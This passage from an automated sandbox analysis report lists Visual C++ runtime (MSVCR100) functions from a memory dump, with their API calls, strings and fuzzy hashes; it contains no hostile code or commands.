                                                                                                            • Part of subcall function 6FDFAF2C: GetCurrentProcess.KERNEL32(C0000417), ref: 6FDFAF42
                                                                                                            • Part of subcall function 6FDFAF2C: TerminateProcess.KERNEL32(00000000), ref: 6FDFAF49
                                                                                                          • _waccess_s.MSVCR100(?,00000000), ref: 6FDD8366
                                                                                                          • _waccess_s.MSVCR100(?,00000000), ref: 6FDD837F
                                                                                                          • _waccess_s.MSVCR100(6FDB3048,00000000), ref: 6FDD8391
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDD83A9
                                                                                                          • wcslen.MSVCR100(6FDB3048), ref: 6FDD83B3
                                                                                                          • calloc.MSVCR100(?,00000002,6FDB3048), ref: 6FDD83C5
                                                                                                          • wcscat_s.MSVCR100(00000000,?,6FDB3048), ref: 6FDD83E4
                                                                                                          • wcslen.MSVCR100(6FDB3048), ref: 6FDD83F5
                                                                                                          • wcscat_s.MSVCR100(00000000,?,6FDB3048), ref: 6FDD8415
                                                                                                          • wcscat_s.MSVCR100(00000000,?,?), ref: 6FDD8431
                                                                                                          • wcslen.MSVCR100(00000000), ref: 6FDD8442
                                                                                                          • _lock.MSVCR100(00000002,00000000), ref: 6FDD844F
                                                                                                          • _errno.MSVCR100 ref: 6FDD847B
                                                                                                          • _errno.MSVCR100 ref: 6FDD8497
                                                                                                          • free.MSVCR100(00000000), ref: 6FDD849F
                                                                                                          • _ultow_s.MSVCR100(0000000A,?,0000000A), ref: 6FDD84C4
                                                                                                          • _errno.MSVCR100 ref: 6FDD84D4
                                                                                                          • _waccess_s.MSVCR100(00000000,00000000), ref: 6FDD84DD
                                                                                                          • _errno.MSVCR100 ref: 6FDD84E8
                                                                                                          • _errno.MSVCR100 ref: 6FDD84F2
                                                                                                          • free.MSVCR100(?), ref: 6FDD8508
                                                                                                          • free.MSVCR100(?,?), ref: 6FDD8510
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$_waccess_swcslen$freewcscat_s$Process_lock$CurrentTerminate_invoke_watson_ultow_s_wdupenv_scalloc
                                                                                                          • String ID: TMP
                                                                                                          • API String ID: 372815076-3125297090
                                                                                                          • Opcode ID: 4bf88a71808160faeb156270acd15dfe749fa173c7f710014d5de395abe8dbe5
                                                                                                          • Instruction ID: 986555586a3cff2e54d03714dea1033db1f50e16ebae85127e14e4ae260a6e35
                                                                                                          • Opcode Fuzzy Hash: 4bf88a71808160faeb156270acd15dfe749fa173c7f710014d5de395abe8dbe5
                                                                                                          • Instruction Fuzzy Hash: 9A517572D08309EBDF926FA89C809AD77B9EF05328F14502EF424E7190EB35B9518B75
                                                                                                          Function 6FD90E69 Relevance: 42.3, APIs: 28, Instructions: 254COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FD90ECE
                                                                                                          • _waccess_s.MSVCR100(?,00000000), ref: 6FD90ED8
                                                                                                            • Part of subcall function 6FD823DB: GetFileAttributesW.KERNEL32(?), ref: 6FD823FC
                                                                                                          • _errno.MSVCR100 ref: 6FD90EE5
                                                                                                          • _wdupenv_s.MSVCR100(?,00000000,?), ref: 6FD90F08
                                                                                                            • Part of subcall function 6FD90CD7: _lock.MSVCR100(00000007,6FD90D48,0000000C), ref: 6FD90CE5
                                                                                                          • wcslen.MSVCR100(?), ref: 6FD90F2D
                                                                                                          • _errno.MSVCR100(00000000,00000000,00000000), ref: 6FD90F50
                                                                                                          • wcslen.MSVCR100(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FD90FAA
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000002,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FD90FF3
                                                                                                          • _waccess_s.MSVCR100(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6FD9100A
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FD9102D
                                                                                                          • wcscpy_s.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6FD91047
                                                                                                          • free.MSVCR100(?), ref: 6FD91083
                                                                                                          • _errno.MSVCR100 ref: 6FDB10BC
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDB10C6
                                                                                                          • _wfullpath.MSVCR100(?,?,?), ref: 6FDB10DF
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDB1105
                                                                                                          • wcslen.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDB1110
                                                                                                          • _calloc_crt.MSVCR100(00000002,00000002,?,00000000,00000000,00000000,00000000,00000000), ref: 6FDB111C
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDB1137
                                                                                                          • _errno.MSVCR100(?,?,?,00000000,00000000,00000000), ref: 6FDB1152
                                                                                                          • wcslen.MSVCR100(?,?,?,?,00000000,00000000,00000000), ref: 6FDB1162
                                                                                                          • _calloc_crt.MSVCR100(00000002,00000002,?,?,?,?,00000000,00000000,00000000), ref: 6FDB116E
                                                                                                          • _errno.MSVCR100 ref: 6FDB11A7
                                                                                                          • _errno.MSVCR100 ref: 6FDB11B2
                                                                                                          • free.MSVCR100(?), ref: 6FDB11C4
                                                                                                          • free.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDB11E8
                                                                                                          • _errno.MSVCR100(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 6FDB11EE
                                                                                                          • free.MSVCR100(?), ref: 6FDB1201
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno$freewcslen$_calloc_crt_waccess_swcscpy_s$AttributesFile_invalid_parameter_noinfo_invoke_watson_lock_wdupenv_s_wfullpath
                                                                                                          • String ID:
                                                                                                          • API String ID: 2532373603-0
                                                                                                          • Opcode ID: c4ad68803143e536c91f90cd71ac1cd1f55f47a2546879041117e4f92c2cfdc0
                                                                                                          • Instruction ID: d3f15a18d89f95a07eb2c98ff90a9c0b8565b84a98ea43fe3e2a92659cd4fd48
                                                                                                          • Opcode Fuzzy Hash: c4ad68803143e536c91f90cd71ac1cd1f55f47a2546879041117e4f92c2cfdc0
                                                                                                          • Instruction Fuzzy Hash: E3916EB5D44329DADBA19F74DC88B9977B5AF05344F1001EAD419EB290EB30BAC08FA1
                                                                                                          Function 6FDD21C4 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 188stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD21D7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD21E2
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _mbsrchr.MSVCR100(?,0000005C), ref: 6FDD220B
                                                                                                          • _mbsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6FDD2215
                                                                                                          • _mbschr.MSVCR100(?,0000003A), ref: 6FDD2228
                                                                                                          • strlen.MSVCR100(?), ref: 6FDD2236
                                                                                                          • _calloc_crt.MSVCR100(00000003,00000001,?), ref: 6FDD2241
                                                                                                          • strcpy_s.MSVCR100(00000000,00000003,6FDB3020), ref: 6FDD225D
                                                                                                          • strcat_s.MSVCR100(00000000,00000003,?), ref: 6FDD226C
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD2284
                                                                                                          • _mbsrchr.MSVCR100(00000000,0000002E), ref: 6FDD229A
                                                                                                          • _access_s.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD22AA
                                                                                                          • strlen.MSVCR100(?), ref: 6FDD22D8
                                                                                                          • _calloc_crt.MSVCR100(00000005,00000001,?), ref: 6FDD22E3
                                                                                                          • strcpy_s.MSVCR100(00000000,00000005,?), ref: 6FDD2300
                                                                                                          • strlen.MSVCR100(?), ref: 6FDD2313
                                                                                                          • _errno.MSVCR100 ref: 6FDD231C
                                                                                                          • strcpy_s.MSVCR100(00000000,00000005,X_o), ref: 6FDD2338
                                                                                                          • _access_s.MSVCR100(00000000,00000000), ref: 6FDD234A
                                                                                                          • _errno.MSVCR100 ref: 6FDD2364
                                                                                                          • free.MSVCR100(00000000), ref: 6FDD2384
                                                                                                          • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2395
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_mbsrchrstrcpy_sstrlen$_access_s_calloc_crtfree$_invalid_parameter_invalid_parameter_noinfo_invoke_watson_mbschrstrcat_s
                                                                                                          • String ID: X_o$X_o
                                                                                                          • API String ID: 3386543907-3302424219
                                                                                                          • Opcode ID: b9582f367145c1780d630e925c0a53a4d608a402c07b9a2e03c0ae774bff502e
                                                                                                          • Instruction ID: 57f3a2da187598ac39cd7823d00d9c240091f67703da3e64deb700d5eb0ebc8c
                                                                                                          • Opcode Fuzzy Hash: b9582f367145c1780d630e925c0a53a4d608a402c07b9a2e03c0ae774bff502e
                                                                                                          • Instruction Fuzzy Hash: E4510332D04305EBEB919FB58C41B9E7BB8AF01369F100165FD24AB1D0EB31BA4187B1
                                                                                                          Function 6FDD2986 Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 187COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD2999
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD29A4
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcsrchr.MSVCR100(?,0000005C), ref: 6FDD29CF
                                                                                                          • wcsrchr.MSVCR100(?,0000002F,?,0000005C), ref: 6FDD29D9
                                                                                                          • wcschr.MSVCR100(?,0000003A), ref: 6FDD29EC
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDD29FA
                                                                                                          • _calloc_crt.MSVCR100(00000003,00000002,?), ref: 6FDD2A05
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000003,6FDB3040), ref: 6FDD2A21
                                                                                                          • wcscat_s.MSVCR100(00000000,00000003,?), ref: 6FDD2A30
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000), ref: 6FDD2A48
                                                                                                          • wcsrchr.MSVCR100(00000000,0000002E), ref: 6FDD2A5E
                                                                                                          • _waccess_s.MSVCR100(?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2A6E
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDD2A99
                                                                                                          • _calloc_crt.MSVCR100(00000005,00000002,?), ref: 6FDD2AA4
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000005,?), ref: 6FDD2AC1
                                                                                                          • wcslen.MSVCR100(?), ref: 6FDD2AD4
                                                                                                          • _errno.MSVCR100 ref: 6FDD2AE0
                                                                                                          • wcscpy_s.MSVCR100(?,?,6FE25F68), ref: 6FDD2B01
                                                                                                          • _waccess_s.MSVCR100(00000000,00000000), ref: 6FDD2B13
                                                                                                          • _errno.MSVCR100 ref: 6FDD2B2B
                                                                                                          • free.MSVCR100(00000000), ref: 6FDD2B45
                                                                                                          • free.MSVCR100(?,00000000,00000000,00000000,00000000,00000000), ref: 6FDD2B56
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errnowcscpy_swcslenwcsrchr$_calloc_crt_waccess_sfree$_invalid_parameter_invalid_parameter_noinfo_invoke_watsonwcscat_swcschr
                                                                                                          • String ID: \_o$h_o
                                                                                                          • API String ID: 1544770758-1414048
                                                                                                          • Opcode ID: 7413c1864153df66205e7aea0eec794575bc74d60dadbb1226189d7de5747867
                                                                                                          • Instruction ID: b42803c2cc32b24531116f77a3284a63fbf8c86b1e72e9d27563cf293af007d4
                                                                                                          • Opcode Fuzzy Hash: 7413c1864153df66205e7aea0eec794575bc74d60dadbb1226189d7de5747867
                                                                                                          • Instruction Fuzzy Hash: F851C272904305EADBA59FB48C41E9E7BB8EF0536EF111165F924AB1D0EB71BA0187A0
                                                                                                          Function 6FDD2B85 Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 183COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDD2B9B
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD2BA6
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _errno.MSVCR100 ref: 6FDD2BBD
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD2BC8
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                                                                                          • String ID: PATH
                                                                                                          • API String ID: 1328987296-1036084923
                                                                                                          • Opcode ID: 747eaed7307baee5c6846f948acd7802358629c09fe082c6d537b6d4520827fb
                                                                                                          • Instruction ID: e390f4154bcf1ad79d4202cfd152271f936c2339ad02474c005f12575dd523e4
                                                                                                          • Opcode Fuzzy Hash: 747eaed7307baee5c6846f948acd7802358629c09fe082c6d537b6d4520827fb
                                                                                                          • Instruction Fuzzy Hash: A2512772905305EBDB915FA4CC809AE73B59F023AFF20442AF9209B190E775BDC197B2
                                                                                                          Function 6FD921F3 Relevance: 34.7, APIs: 23, Instructions: 213stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • wcsnlen.MSVCR100(?,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FD9221D
                                                                                                          • wcsnlen.MSVCR100(?,00007FFF,?,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FD92228
                                                                                                          • _calloc_crt.MSVCR100(00000002,00000002), ref: 6FD92247
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000002,?), ref: 6FD9225E
                                                                                                          • wcscpy_s.MSVCR100(?,00000002,?,00000000,00000002,?), ref: 6FD9227B
                                                                                                            • Part of subcall function 6FD91FBA: wcschr.MSVCR100(00000000,0000003D,7650DF80,00000000,00000000), ref: 6FD91FE5
                                                                                                            • Part of subcall function 6FD91FBA: free.MSVCR100(?,7650DF80,00000000,00000000), ref: 6FD92058
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922B9
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922D5
                                                                                                          • _calloc_crt.MSVCR100(00000000,00000001), ref: 6FD922E2
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD922FB
                                                                                                          • strlen.MSVCR100(00000000), ref: 6FD9230D
                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6FD9232B
                                                                                                          • _errno.MSVCR100 ref: 6FD92350
                                                                                                          • _errno.MSVCR100(?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB0FCE
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB0FD9
                                                                                                          • wcschr.MSVCR100(?,0000003D,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB0FE9
                                                                                                          • wcsnlen.MSVCR100(-00000002,00007FFF,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB100D
                                                                                                          • wcslen.MSVCR100(?,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB1019
                                                                                                          • _calloc_crt.MSVCR100(00000001,00000002,?,?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB1024
                                                                                                          • wcscpy_s.MSVCR100(00000000,00000001,?), ref: 6FDB103A
                                                                                                          • _errno.MSVCR100(?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB1047
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?,?,?,00000007,00000007,?,6FD920A6,?,?,6FD920C8,0000000C), ref: 6FDB1052
                                                                                                          • free.MSVCR100(00000000), ref: 6FDB106D
                                                                                                          • free.MSVCR100(?), ref: 6FDB108F
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ByteCharMultiWide$_calloc_crt_errnofreewcscpy_swcsnlen$_invalid_parameter_noinfowcschr$strlenwcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 4036047774-0
                                                                                                          • Opcode ID: 6685b5d76d50197a850b0b25ff221914c08fbb8da60f012afc37bbdb0b3d6940
                                                                                                          • Instruction ID: d2553643eb8851e31a89df4ac1165988d3bc3f8fc05b44811ecce256cee054c0
                                                                                                          • Opcode Fuzzy Hash: 6685b5d76d50197a850b0b25ff221914c08fbb8da60f012afc37bbdb0b3d6940
                                                                                                          • Instruction Fuzzy Hash: 6C51C1B250A318FACB516FE48C88D9F3B68DF46B79B20025EF129961D0DB35B64196B0
                                                                                                          Function 6FDCC050 Relevance: 33.4, APIs: 14, Strings: 5, Instructions: 148filestringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _set_error_mode.MSVCR100(00000003,00000001,00000001,00000000), ref: 6FDCC086
                                                                                                          • _set_error_mode.MSVCR100(00000003,00000001,00000001,00000000), ref: 6FDCC097
                                                                                                          • wcscpy_s.MSVCR100(6FE27D70,00000314,Runtime Error!Program: ,00000001,00000001,00000000), ref: 6FDCC0CA
                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,6FE27DA2,00000104,00000001,00000001,00000000), ref: 6FDCC0EC
                                                                                                          • wcscpy_s.MSVCR100(6FE27DA2,000002FB,<program name unknown>), ref: 6FDCC102
                                                                                                          • _invoke_watson.MSVCR100(00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC115
                                                                                                          • wcslen.MSVCR100(00000001,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC11B
                                                                                                          • wcslen.MSVCR100(00000314,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC128
                                                                                                          • wcsncpy_s.MSVCR100(00000000,00000000,...,00000003,00000314,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC145
                                                                                                          • wcscat_s.MSVCR100(6FE27D70,00000314,6FDCC200,00000000,00000000,00000000,00000000,00000000,00000001,00000001,00000000), ref: 6FDCC15D
                                                                                                          • wcscat_s.MSVCR100(6FE27D70,00000314,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000001), ref: 6FDCC171
                                                                                                          • GetStdHandle.KERNEL32(000000F4,00000001,00000001,00000000), ref: 6FDCC19E
                                                                                                          • strlen.MSVCR100(?,?,00000000), ref: 6FDCC1DB
                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 6FDCC1EA
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File_set_error_modewcscat_swcscpy_swcslen$HandleModuleNameWrite_invoke_watsonstrlenwcsncpy_s
                                                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $p}o
                                                                                                          • API String ID: 258868472-2225776274
                                                                                                          • Opcode ID: 2c6a75c376e0f0bd1ccd4a6977bceb536d23bbf17dd7ed4535187ff10e85e501
                                                                                                          • Instruction ID: 7663333f4043c8b549c3d1df3bffda1503559324ec27bb0f0ee23c97d3d599ab
                                                                                                          • Opcode Fuzzy Hash: 2c6a75c376e0f0bd1ccd4a6977bceb536d23bbf17dd7ed4535187ff10e85e501
                                                                                                          • Instruction Fuzzy Hash: 7F412B73940355AAEB8157768C44FFF36AC9F0676CF110136FA54E71C0EB20BA4245A2
                                                                                                          Function 6FD9854A Relevance: 33.3, APIs: 18, Strings: 1, Instructions: 87COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _FindAndUnlinkFrame.MSVCR100(?), ref: 6FD98560
                                                                                                            • Part of subcall function 6FD983D1: _getptd.MSVCR100 ref: 6FD983D7
                                                                                                            • Part of subcall function 6FD983D1: _getptd.MSVCR100 ref: 6FD983EB
                                                                                                          • _getptd.MSVCR100 ref: 6FD98576
                                                                                                          • _getptd.MSVCR100 ref: 6FD98585
                                                                                                          • _getptd.MSVCR100 ref: 6FD98596
                                                                                                          • _getptd.MSVCR100 ref: 6FD985AA
                                                                                                          • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6FD985B8
                                                                                                            • Part of subcall function 6FD983AA: _getptd.MSVCR100 ref: 6FD983AF
                                                                                                          • _getptd.MSVCR100(00000001), ref: 6FD985C4
                                                                                                          • __DestructExceptionObject.MSVCR100(?,00000001), ref: 6FD985CF
                                                                                                          • _getptd.MSVCR100 ref: 6FD985D6
                                                                                                          • _getptd.MSVCR100 ref: 6FD985E5
                                                                                                          • _getptd.MSVCR100 ref: 6FD985F6
                                                                                                          • _getptd.MSVCR100 ref: 6FD98614
                                                                                                          • _getptd.MSVCR100 ref: 6FD98622
                                                                                                          • _getptd.MSVCR100 ref: 6FDACA42
                                                                                                          • _getptd.MSVCR100 ref: 6FDACA5A
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                                                                                          • String ID: csm
                                                                                                          • API String ID: 473968603-1018135373
                                                                                                          • Opcode ID: 393515e66f6cd6f8556c6123cd2c61eaaadf32aa08d920afe1cd1ee9e48e9f68
                                                                                                          • Instruction ID: 25cb8c8f560eb95897cfc94590e1c4ab4a9eb7f2bb368a7d030c572a8b448851
                                                                                                          • Opcode Fuzzy Hash: 393515e66f6cd6f8556c6123cd2c61eaaadf32aa08d920afe1cd1ee9e48e9f68
                                                                                                          • Instruction Fuzzy Hash: D8311934009700CFC3C0AFA4D888E5533A9BF017A5F8590B9D2AA8F5A2DF31F8858F61
                                                                                                          Function 6FD866AA Relevance: 33.3, APIs: 22, Instructions: 295COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • InterlockedDecrement.KERNEL32(?), ref: 6FD712D7
                                                                                                          • free.MSVCR100(?), ref: 6FD7131B
                                                                                                          • _malloc_crt.MSVCR100(00000004), ref: 6FD866EF
                                                                                                            • Part of subcall function 6FD80B31: malloc.MSVCR100(00000001,00000001,00000001,?,6FD8A974,00000018,6FD8A948,0000000C,6FDA74F7,00000001,00000001,?,6FD81EE5,0000000D), ref: 6FD80B3D
                                                                                                          • _calloc_crt.MSVCR100(00000180,00000002,00000004), ref: 6FD866FF
